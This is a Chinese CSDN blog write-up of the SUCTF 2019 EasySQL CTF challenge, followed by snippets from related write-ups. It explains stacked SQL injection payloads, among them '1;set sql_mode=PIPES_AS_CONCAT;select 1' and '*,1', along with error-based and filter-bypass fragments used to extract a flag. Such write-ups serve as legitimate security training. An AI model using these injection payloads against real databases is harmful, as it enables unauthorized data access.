[SUCTF 2019]EasySQL

最新推荐文章于 2024-03-28 22:54:01 发布
最新推荐文章于 2024-03-28 22:54:01 发布
阅读量139 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42346836/article/details/109401812
版权

关键的查询代码是 select $post['query']||flag from Flag

  1. 输入的内容为*,1*

    sql语句就变成了select *,1||flag from Flag(此时||是逻辑或)也就是select *,1 from Flag,也就是直接查询出了Flag表中的所有内

  2. 输入 1 或 0 查询结果如图,要想办法让 ||不是逻辑或
    官方给的 payload 是1;set sql_mode=PIPES_AS_CONCAT;select 1

    拼接一下就是select 1;set sql_mode=PIPES_AS_CONCAT;select 1||flag from Flag

    关于 sql_mode : 它定义了 MySQL 应支持的 SQL 语法,以及应该在数据上执行何种确认检查,其中的PIPES_AS_CONCAT||视为字符串的连接操作符而非 “或” 运算符

  3. 这个模式下进行查询的时候,使用字母连接会报错,使用数字连接才会查询出数据,因为这个||相当于是将 select 1select flag from flag 的结果拼接在一起

    select 1;select flag from flag(应该是这个意思)

    Array ( [0] => 1 ) Array ( [0] => 1flag{550336de-2cb6-4945-977c-e0cc7b204c3b} )

mysql>show tables;
1
flag
mysqlselect *,1 from Flag;
Fuckxx
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
_PE_Format.pdf
03-26
根据提供的文件信息,我们可以推断出这份文档主要讨论的是便携式可执行文件格式(Portable Executable File Format,简称 PE 文件格式),并且是从逆向工程的角度进行探讨的。接下来,我们将详细解读并提取该文件中...
web---学习
weixin_44897902的博客
10-26 529
BUUCTF 参考:https://www.cnblogs.com/0nth3way/articles/7128189.html https://blog.csdn.net/qq_42181428/article/details/99741920 admin 随便注册一个东西进去,在修改密码那查看源码,发现源码地址,下载下来是一个python的web部署源码,查看路由:route 解法一:Unic...
为什么select * || flag from flag 不行呢?
wojiushilsy的博客
04-27 1581
首先*(星号)在SQL语句中有特殊的意义。应该是保留字或关键字 (没找到*(星号)属于什么) 。 所以你直接使用 select * || flag from flag 会报语法错误。 实验一: 这是一张表 查询语句 SELECT *||mpassword FROM rjqm.manager; 结果: 和查询语句 SELECT .||mpassword FROM rjqm.manager; 结果是...
CTF实验吧-WEB专题-2
qq_18661257的专栏
12-19 7543
1.简单的sql注入之2 题解 我们先单引号试一下发现报错,所以基本存在注入,然后我们用空格会爆SQLi detected!因此被过滤了,发现+还是%a0这些编码都会报错,所以只能用万能空格替代/**/,然后测试是否含有flag表,接着测试是否含有flag列,然而并没有什么卵用,因为这货竟然过滤了左右括号,无法用exists判断flag表是否存在,同时由于左右括号不能用,为了让判断flag表存在
[SUCTF 2019]EasySQL _WP
Accompany的博客
01-09 1260
文章目录初次尝试堆叠注入payload 初次尝试 看到题目,我们就知道是sql注入了 万能密码,回显nonono,无果 再输入0和非0数会发现一个没有回显,一个是只要非0便是相同的回显,这个相同的回显很重要,我们猜测他的后端语句,可能会有||这个东西 接着想试试注入,尽管1和1’会有不同的回显,但紧接着的各种注入方式回显都是nonono,这时就像上一篇的sql题一样,可能他过滤了许多关键字,便想到了堆叠注入 其实在这也可直接跑字典,就可以少试探几步 返回数据 返回nonono
[SUCTF 2019]EasySQL 1
m0_73734159的博客
10-31 410
对于每一行,都会生成一个新的字符串,这个字符串是数字1后跟着flag列的值。大致意思,就是查看数据表Flag的所有列内容,然后添加了一个由列flag的值与数字1进行连接生成的新列,这个新的列名就叫1,那么猜测或者说就是flag被过滤,我们还能查到flag列的值,因为flag的值复制到了新的列1。因此,这段代码的输出结果将包含Flag表的所有列,以及一个名为“1”的列,该列的值是flag列的值与数字1的连接。这段SQL代码的含义是:从Flag表中选择所有的列,以及由列flag的值与数字1进行连接生成的新列。
buuctf 刷题5(sql注入篇)
weixin_63231007的博客
05-10 4014
sql注入挺难的我感觉,但是很重要,有好多绕过,和注入手段需要一步步在尝试,因此本章刷一下buuctf各个sql注入题目,来巩固联系一下自己在sql注入方面的知识。 [极客大挑战 2019]HardSQL 1 输入1',出错,1'#显示不同,存在单引号闭合注入。 order by查字段,union,堆叠注入,和输入数字都烦返回错误 =,空格,和好多关键字都被过滤了。 空格用()绕过,=用like绕过。 尝试报错注入: 1'or(updatexml(1,concat...
[SUCTF 2019]EasySQL 1(SQL堆叠注入+select 1 from的用法+sql_mode=PIPES_AS_CONCAT)
Home to come
08-19 5811
(本文为个人刷题记录,不记录完整解题步骤,而是写一下自己的感悟点) 为了准备20/8/20号信安大赛,临阵磨枪刷一下题 SQL堆叠注入   这个就不再写原理了,之前也遇到很多了,就是一个sql语句";"后面可以继续执行sql查询语句。 试一下堆叠注入查询数据库 1;show databases; 查询表名 1;show tables; 这里直接用下面查询FLag表是不行的 1;show columns from Flag;# 接下来就是最迷的步骤,大佬居然可以从报错中猜出查询语句是: select $
BUUCTF [SUCTF 2019]EasySQL1 writeup(详细版)
热门推荐
m0_62851980的博客
04-10 1万+
考点:堆叠注入,MySQL和mssql中||运算符的区别,运算符的意义转换(操作符重置) 打开靶机,尝试输入1查看回显: 可以看到表格回显了内容:1,用其他非0数字尝试全都回显1,那我们换个数字尝试,比如0: 什么都没有。 使用Sql堆叠注入查看信息,先用show指令查看数据库:1;show databases; 再查看一下表:1;show tables; 看到Flag表,猜测flag应该在Flag中。 但是直接select flag from Flag查询是查不...
web:[SUCTF 2019]EasySQL
sleepywin的博客
09-25 946
将”||”视为字符串的连接操作符而非或运算符,这和Oracle数据库是一样的,也和字符串的拼接函数Concat相类似.SELECT * 和 SELECT 所有列,两者差别几乎可忽略。所以查询所有字段(或者大多数字段)的时候,可以用select *来操作。|| 逻辑或的短路:a||b计算机发现a是真,那么输出a;如果a是假,那么输出bselect 1 from :建立一个临时列,这个列的所有初始值都被设为1。Mysql中的||0 || 1 = 13 || 4 = 10 || 0 = 0。
[SUCTF 2019]EasySQL1 题目分析与详解
2302_79800344的博客
02-24 2452
EasySQL
[suctf 2019]EasySQL
qq_73861475的博客
09-08 170
先尝试输入1然后尝试输入其他非0的数字,回显都是1,但0回显什么都没有,字母也没有回显看到题目标签,可以用堆叠注入先用看到Flag表,但是用1;无法回显出flag(注:1;show columns from用来查询表中列名称)后面的这一部分则去看别人的wpc1和c2其中一侧为1则取1,否则取0。
Buuctf web [SUCTF 2019]EasySQL
m0_61903191的博客
09-13 1275
又是一道考察sql注入的题。
[suctf 2019]EasySQL(WP)
最新发布
wikey 的博客
03-28 386
直接查目录发现失败,推测可能更改过系统设置,我们知道flag在目录里但是不能直接打开需要更改设置后访问,这里需要扩展一下PIPES_AS_CONCAT 函数的含义,它的作用就是将两个任务重合在一起执行。当 sql_mode 没有设置 PIPES_AS_CONCAT 时 (默认没有设置),|| 就是逻辑或,相当于OR函数。sql_mode 设置了 PIPES_AS_CONCAT 时,|| 就是字符串连接符,相当于CONCAT() 函数。如果command1执行失败,则执行command2。
suctf 2019 easysql怎么解
03-28
题目链接:http://easysql.suctf2019.cn:8888/ 题解 进入网站后,可以看到一个登录页面,尝试使用常见的一些弱口令进行登录,发现均不可行。故考虑其他方式进入系统。 点击右上角的注册按钮,可以看到注册页面。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值